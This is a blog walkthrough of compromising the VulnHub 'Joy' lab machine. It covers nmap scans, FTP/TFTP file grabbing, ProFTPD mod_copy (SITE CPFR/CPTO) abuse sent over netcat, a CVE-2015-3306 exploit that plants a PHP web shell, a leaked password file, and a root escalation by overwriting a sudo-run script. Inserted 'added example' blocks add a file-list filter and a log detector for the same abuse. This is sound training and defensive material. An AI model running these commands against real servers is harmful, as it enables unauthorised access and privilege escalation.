# Digitalworld Joy VulnHub Walkthrough

Note: this post was originally posted on another blog I had in June 2020. I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.

Digitalworld.local Joy: https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

This machine would have been much more complicated if not for enumeration. Most of the work was getting the initial shell, and after that, the box fell quickly. I learned that if I find a vulnerability with a public exploit, calm down, take note of it, and keep enumerating because there could be more exploits (more reliable/easy). For example, I wasted a lot more time on the Dropbear SSH exploit than I should have.

## Flow
## Initial Enumeration

### Nmap – TCP Ports

```shell
nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136
```

```
# Nmap 7.80 scan initiated Tue Jun 16 07:54:40 2020 as: nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136
Nmap scan report for 10.88.42.136
Host is up (0.00046s latency).
Not shown: 65523 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL TOP CAPA STLS AUTH-RESP-CODE UIDL RESP-CODES
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: OK LITERAL+ IMAP4rev1 have ENABLE ID more IDLE post-login listed SASL-IR capabilities Pre-login STARTTLS LOGINDISABLEDA0001 LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:32:A4:6A (VMware)
Service Info: Hosts:  The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2020-06-16T19:54:56+08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-06-16T11:54:56
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 16 07:57:41 2020 -- 1 IP address (1 host up) scanned in 181.15 seconds
```

### Nmap – UDP Ports

SNMP conveniently displays a process listing, netstat info, and installed packages. In addition, it shows a TFTP service running on port 36969 that’s serving patrick’s home directory. I truncated the Nmap output a lot to show that.

```shell
nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000 10.88.42.136
```

```
# Nmap 7.80 scan initiated Tue Jun 16 08:06:13 2020 as: nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000 10.88.42.136
Nmap scan report for 10.88.42.136
Host is up (0.00069s latency).
Not shown: 994 closed ports
PORT    STATE         SERVICE     VERSION
68/udp  open|filtered dhcpc
123/udp open          ntp         NTP v4 (secondary server)
| ntp-info:
|_
137/udp open          netbios-ns  Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
161/udp open          snmp        SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: d1785e76ec962f5c00000000
|   snmpEngineBoots: 29
|_  snmpEngineTime: 44m11s
| snmp-interfaces:
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 5.31 Kb sent, 5.31 Kb received
|   Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
|     IP address: 10.88.42.136  Netmask: 255.255.255.0
|     MAC address: 00:0c:29:32:a4:6a (VMware)
|     Type: ethernetCsmacd  Speed: 1 Gbps
|_    Traffic stats: 89.38 Mb sent, 241.11 Mb received
| snmp-netstat:
|   TCP  0.0.0.0:21           0.0.0.0:0
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  0.0.0.0:25           0.0.0.0:0
|   TCP  0.0.0.0:110          0.0.0.0:0
|   TCP  0.0.0.0:139          0.0.0.0:0
|   TCP  0.0.0.0:143          0.0.0.0:0
|   TCP  0.0.0.0:445          0.0.0.0:0
|   TCP  0.0.0.0:465          0.0.0.0:0
|   TCP  0.0.0.0:587          0.0.0.0:0
|   TCP  0.0.0.0:993          0.0.0.0:0
|   TCP  0.0.0.0:995          0.0.0.0:0
|   TCP  127.0.0.1:631        0.0.0.0:0
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   UDP  0.0.0.0:68           *:*
|   UDP  0.0.0.0:123          *:*
|   UDP  0.0.0.0:137          *:*
|   UDP  0.0.0.0:138          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  0.0.0.0:631          *:*
|   UDP  0.0.0.0:1900         *:*
|   UDP  0.0.0.0:5353         *:*
|   UDP  0.0.0.0:36969        *:*
|   UDP  0.0.0.0:42070        *:*
|   UDP  0.0.0.0:51704        *:*
|   UDP  10.88.42.136:123     *:*
|   UDP  10.88.42.136:137     *:*
|   UDP  10.88.42.136:138     *:*
|   UDP  10.88.42.255:137     *:*
|   UDP  10.88.42.255:138     *:*
|_  UDP  127.0.0.1:123        *:*
| snmp-processes:
...
|   754:
|     Name: in.tftpd
|     Path: /usr/sbin/in.tftpd
|     Params: --listen --user tftp --address 0.0.0.0:36969 --secure /home/patrick
...
```

### FTP – Anonymous FTP

Since anonymous FTP is active and there are files to grab, I decided to grab them all.
I’m not sure what the best tool is, but I’ve always used the lftp client to mirror FTP contents.

```shell
mkdir ftp
cd ftp
lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136
```

### FTP – Files

```
.
./download
./upload
./upload/project_yolo
./upload/project_malindo
./upload/project_woranto
./upload/project_flamingo
./upload/project_bravado
./upload/project_luyano
./upload/project_komodo
./upload/project_desperado
./upload/reminder
./upload/project_okacho
./upload/directory
./upload/project_toto
./upload/project_sicko
./upload/project_zoo
./upload/project_vivino
./upload/project_armadillo
./upload/project_polento
./upload/project_indigo
./upload/project_uno
./upload/project_emilio
./upload/project_ronaldinho
```

### FTP – upload/directory

More confirmation that patrick is a user on the system. It also seems like this is /home/patrick (previously mentioned in the process listing via SNMP).

```
Patrick's Directory
total 128
drwxr-xr-x 18 patrick patrick 4096 Jun 16 20:10 .
drwxr-xr-x  4 root    root    4096 Jan  6  2019 ..
-rw-------  1 patrick patrick  185 Jan 28  2019 .bash_history
-rw-r--r--  1 patrick patrick  220 Dec 23  2018 .bash_logout
-rw-r--r--  1 patrick patrick 3526 Dec 23  2018 .bashrc
drwx------  7 patrick patrick 4096 Jan 10  2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26  2018 .config
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Desktop
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Documents
drwxr-xr-x  3 patrick patrick 4096 Jan  6  2019 Downloads
drwx------  3 patrick patrick 4096 Dec 26  2018 .gnupg
-rwxrwxrwx  1 patrick patrick    0 Jan  9  2019 haha
-rw-r--r--  1 patrick patrick    0 Jun 16 19:50 HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt
-rw-r--r--  1 patrick patrick    0 Jun 16 19:45 IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt
-rw-------  1 patrick patrick 8532 Jan 28  2019 .ICEauthority
drwxr-xr-x  3 patrick patrick 4096 Dec 26  2018 .local
drwx------  5 patrick patrick 4096 Dec 28  2018 .mozilla
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Music
drwxr-xr-x  2 patrick patrick 4096 Jan  8  2019 .nano
-rw-r--r--  1 patrick patrick   24 Jun 16 19:45 p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Pictures
-rw-r--r--  1 patrick patrick  675 Dec 23  2018 .profile
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Public
-rw-r--r--  1 patrick patrick   24 Jun 16 20:05 qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt
-rw-r--r--  1 patrick patrick   24 Jun 16 20:00 QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt
d---------  2 root    root    4096 Jan  9  2019 script
-rw-r--r--  1 patrick patrick   24 Jun 16 19:50 sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt
-rw-r--r--  1 patrick patrick    0 Jun 16 20:05 soqjRoS2by1apdqTErDEQTspl2YuWgva.txt
drwx------  2 patrick patrick 4096 Dec 26  2018 .ssh
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 Sun
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Templates
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 .txt
-rw-r--r--  1 patrick patrick    0 Jun 16 20:10 U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt
-rw-r--r--  1 patrick patrick   24 Jun 16 19:55 u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt
-rw-r--r--  1 patrick patrick    0 Jun 16 20:00 uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt
-rw-r--r--  1 patrick patrick  407 Jan 27  2019 version_control
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Videos
-rw-r--r--  1 patrick patrick    0 Jun 16 19:55 xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt
-rw-r--r--  1 patrick patrick   24 Jun 16 20:10 ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt

You should know where the directory can be accessed.

Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
```

## What I Did Before the UDP Scan Finished

### Dropbear SSH Exploit Attempt

I wasted too much time getting tunnel vision on trying to exploit Dropbear SSH (there’s an old exploit I spent time trying to get to work). It ultimately wasn’t fruitful. There’s an entry in searchsploit for it (exploits/linux/remote/387.c).
### ProFTPD Exploit Attempt

I spent time on a searchsploit-provided exploit (exploits/linux/remote/36803.py), but it requires the web directory. I did learn about the CPFR and CPTO commands. I should have tried to use them to get patrick’s files. I’ll show it after the TFTP method (likely the intended method).

## What We Now Know
## TFTP – Getting Patrick’s Files

Now we need to grab each of patrick’s files from TFTP using the file list. Be sure to remove `.` and `..` from the list of files.

```shell
awk '/[0-9] /{print $9}' ftp/upload/directory > patrick_files.txt
# remove . and .. from patrick_files.txt
mkdir tftp
cd tftp
for file in `cat ../patrick_files.txt`; do echo -e "get $file\nquit\n"|tftp 10.88.42.136 36969; done
for i in *; do echo ">> $i <<" && cat $i; done
```

```
>> Desktop <<
>> Documents <<
>> Downloads <<
>> haha <<
>> HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt <<
>> IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt <<
>> Music <<
>> p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt <<
Patrick is hardworking!
>> Pictures <<
>> Public <<
>> qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt <<
Patrick is hardworking!
>> QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt <<
Patrick is hardworking!
>> script <<
>> sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt <<
Patrick is hardworking!
>> soqjRoS2by1apdqTErDEQTspl2YuWgva.txt <<
>> Sun <<
>> Templates <<
>> U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt <<
>> u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt <<
Patrick is hardworking!
>> uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt <<
>> version_control <<
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.

1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
>> Videos <<
>> x86_64 <<
>> xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt <<
>> ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt <<
Patrick is hardworking!
```

## FTP – Getting Patrick’s Files

We can use the CPFR and CPTO trick to put patrick’s files in the upload directory.
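Both the TFTP loop above and the FTP copy loop that follows read `patrick_files.txt`, and the `awk '/[0-9] /{print $9}'` filter also matches the kernel banner line at the bottom of the `directory` file, which is why a stray `>> x86_64 <<` shows up in the TFTP output. As an added example (not from the original post), here is a stricter filter that only accepts lines whose first field is a mode string, drops `.` and `..`, and keeps names containing spaces; it runs on a constructed excerpt of the listing, with one invented entry to exercise the space handling.

```shell
#!/bin/sh
# Added example (not from the original post): build the file list for the
# TFTP/FTP loops from an "ls -la" style listing without "." and ".." and
# without stray tokens from lines that are not directory entries (the
# /[0-9] / filter also matched the kernel banner line and emitted x86_64).

# Constructed excerpt of ftp/upload/directory, same layout as the real file;
# the "notes with spaces.txt" entry is invented to exercise the name handling.
SAMPLE_LISTING="Patrick's Directory
total 128
drwxr-xr-x 18 patrick patrick 4096 Jun 16 20:10 .
drwxr-xr-x  4 root    root    4096 Jan  6  2019 ..
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
-rw-r--r-- 1 patrick patrick 12 Jan 9 2019 notes with spaces.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:45 p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt
d--------- 2 root root 4096 Jan 9 2019 script
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
You should know where the directory can be accessed.
Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux"

# Print one entry name per line. A line counts as an entry only if its first
# field looks like a mode string (type char + 9 permission chars, optional
# ACL/xattr marker) and it has at least 9 fields. The name is whatever follows
# the eighth field, so names with spaces survive; "name -> target" symlink
# lines are not special-cased.
list_entries() {
    awk '
    $1 ~ /^[-dlcbps][-rwxsStT]+[+.@]?$/ && length($1) >= 10 && NF >= 9 {
        name = $0
        for (i = 1; i <= 8; i++) sub(/^[^ ]+ +/, "", name)
        if (name != "." && name != "..") print name
    }'
}

printf '%s\n' "$SAMPLE_LISTING" | list_entries
```

Redirect the output to `patrick_files.txt` in place of the awk one-liner; the manual "remove . and .." step is then no longer needed.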
Be sure to remove `.` and `..` from the file list, or you could fill up the hard disk (yes, I did it). This takes some guesswork if you don’t know where the FTP directory is, but I guessed/knew it was /home/ftp.

```shell
for file in `cat patrick_files.txt`; do echo -e "site cpfr /home/patrick/$file\nsite cpto /home/ftp/upload/$file\nquit"|nc 10.88.42.136 21; done
cd ftp && lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136; cd -
```

## Exploiting ProFTPD

We now know the web directory is /var/www/tryingharderisjoy, which is the last piece of information needed for the ProFTPD exploit. I tried the exploit in searchsploit, but it didn’t work. So I went looking on the web and found https://github.com/t0kx/exploit-CVE-2015-3306/, which works!

```
[18:10:35]🔥root[ /home/kali/VulnHub/joy ]# python3 exploit.py
usage: exploit.py [-h] --host HOST --port PORT --path PATH
exploit.py: error: the following arguments are required: --host, --port, --path
[18:10:40]🔴->2 root[ /home/kali/VulnHub/joy ]# python3 exploit.py --host 10.88.42.136 --port 21 --path /var/www/tryingharderisjoy
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 10.88.42.136:21
[+] Target exploited, acessing shell at http://10.88.42.136/backdoor.php
[+] Running whoami: www-data
[+] Done
[18:11:30]🔥root[ /home/kali/VulnHub/joy ]#
```

Commands are then run through `http://10.88.42.136/backdoor.php?cmd=COMMAND_HERE`.

`which nc` returns nothing, so netcat isn’t installed. So I went back to http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to see the reverse shell options again. I tried the bash one, and it didn’t work. So I went to CyberChef to URL-encode the bash reverse shell. I tried the PHP one (since I know PHP is installed), and it did work. I also went to CyberChef to URL-encode the PHP reverse shell.

## Pivot to the Patrick User

Looking around, the ossec directory is there, so I looked inside of it. There’s a suspect file, `patricksecretsofjoy`, and it contains patrick’s password.

```
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:

patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis

how would these hack3rs ever find such a page?
www-data@JOY:/var/www/tryingharderisjoy/ossec$
```

patrick:apollo098765

I tried to ssh in, but that didn’t work.

```
$ ssh patrick@10.88.42.136
Unable to negotiate with 10.88.42.136 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1
```

I could, fortunately, su to patrick.

## Pivot to Root

There’s a sudo entry that runs a custom command. Unfortunately, I couldn’t edit or read the file directly. But I could replace its contents using the FTP CPFR/CPTO trick from earlier.

```shell
cd /dev/shm
echo -e '#!/bin/sh\nsh\n' > test
chmod +x test
echo -e "site cpfr /dev/shm/test\nsite cpto /home/patrick/script/test\nquit" | nc 10.88.42.136 21
```

Then I ran the sudo command and got a root shell.

## Flag
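Both the web-shell step (CVE-2015-3306 against ProFTPD) and the overwrite of the sudo script above rode on the same two commands, `SITE CPFR` followed by `SITE CPTO`, issued to port 21 without a real login. As an added example that is not part of the original post, this awk filter flags such pairs in a ProFTPD ExtendedLog; it assumes the `default` LogFormat (`%h %l %u %t "%r" %s %b`) and runs on constructed log lines modelled on this box, not on a capture from it.

```shell
#!/bin/sh
# Added example (not from the original post): flag SITE CPFR -> SITE CPTO pairs
# in a ProFTPD ExtendedLog. Assumes the "default" LogFormat:
#   %h %l %u %t "%r" %s %b
# so $1 is the client, $3 the user and the quoted command starts at $6.

# Constructed log lines modelled on this box (not a capture from it).
SAMPLE_LOG='10.88.42.1 UNKNOWN anonymous [16/Jun/2020:18:10:40 +0800] "USER anonymous" 331 -
10.88.42.1 UNKNOWN anonymous [16/Jun/2020:18:10:40 +0800] "PASS (hidden)" 230 -
10.88.42.1 UNKNOWN anonymous [16/Jun/2020:18:10:41 +0800] "SITE CPFR /home/ftp/upload/reminder" 350 -
10.88.42.1 UNKNOWN anonymous [16/Jun/2020:18:10:41 +0800] "SITE CPTO /var/www/tryingharderisjoy/backdoor.php" 250 -
10.88.42.1 UNKNOWN - [16/Jun/2020:18:40:02 +0800] "site cpfr /dev/shm/test" 350 -
10.88.42.1 UNKNOWN - [16/Jun/2020:18:40:02 +0800] "site cpto /home/patrick/script/test" 250 -
10.88.42.7 UNKNOWN patrick [16/Jun/2020:18:20:02 +0800] "RETR version_control" 226 407
10.88.42.7 UNKNOWN patrick [16/Jun/2020:18:21:00 +0800] "SITE CPFR /home/patrick/version_control" 350 -
10.88.42.7 UNKNOWN patrick [16/Jun/2020:18:21:00 +0800] "SITE CPTO /home/patrick/Documents/version_control" 250 -
10.88.42.9 UNKNOWN anonymous [16/Jun/2020:18:30:00 +0800] "SITE CPTO /tmp/x" 550 -'

# Print one alert per CPFR -> CPTO pair seen from the same client:
#   <severity> <client> <user> <source> -> <destination> status=<reply>
# A pair issued before login ("-") or by an anonymous account is HIGH: that is
# exactly what the unpatched server should have refused. FTP verbs are
# case-insensitive, hence toupper(). Paths containing spaces are truncated
# to their first token by this field-based parse.
detect_mod_copy() {
    awk '
    function arg(s) { sub(/"$/, "", s); return s }
    toupper($6) == "\"SITE" && toupper($7) == "CPFR" { src[$1] = arg($8); next }
    toupper($6) == "\"SITE" && toupper($7) == "CPTO" && ($1 in src) {
        sev = ($3 == "-" || $3 == "anonymous" || $3 == "ftp") ? "HIGH" : "MEDIUM"
        printf "%s %s %s %s -> %s status=%s\n", sev, $1, $3, src[$1], arg($8), $9
        delete src[$1]
    }'
}

printf '%s\n' "$SAMPLE_LOG" | detect_mod_copy
```

This only tells you whether the copy commands were ever used; the fix is the ProFTPD upgrade that the machine's own version_control note already asks for.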